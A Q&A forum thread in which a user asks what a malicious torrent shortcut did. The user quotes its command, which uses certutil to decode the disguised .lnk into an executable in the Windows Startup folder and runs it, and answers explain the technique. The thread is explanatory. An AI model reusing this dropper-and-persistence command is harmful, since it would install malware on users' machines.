# Downloaded a file which turned out to be a shortcut that ran the following command, not sure what it did

Tags: windows, cmd

I downloaded a torrent which turned out to be a shortcut that did the following thing.

```
%ComSpec% /c certutil -decode "Succession.S02E07.720p.WEB.x265-MiNX.mkv.lnk" 
  "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe" >nul 2>&1 && 
  "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%USERNAME%.exe"
```

Does anyone have any idea what this file did? I accidentally ran it.

The file was 222MB large. I checked my startup folder but there seems to be nothing there, maybe because I pressed cancel when the cmd window popped up. But the file went from 222MB to 1.85 kb after I ran it.

The link to the file is a torrent here `https://thepiratebay.org/torrent/34688106/Succession.S02E07.720p.WEB.x265-MiNX`

Downloading it won't do anything but running it will. I also ran avast scan and windows defender scan on the file but it found nothing.

I re-downloaded the file and renamed the .lnk to .txt, it looks like a security certificate.

Comment: Unfortunately, we are not a malware removal or a malware code review site.

Answer (score 2, accepted):

[certutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil) is a built-in program in Windows used to manage certificates. The above command would be decoding the certificate present in the file and install malware. An article illustrating how this could be [used.](https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/)

Comment: do you know how i can find it and remove it? could it be ransomware?

Comment: COMSPEC points to cmd. It then decodes the file using certutil and create a.exe file in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup with your username as the .exe filename and executes it.

Comment: So if the file is not in the startup folder I should be fine?

Comment: Does it execute at the time of creation? Or during startup?

Comment: Once the file is decoded successfully, the .exe would be executed. As long as the .exe is present in startup folder it will be executed on every startup.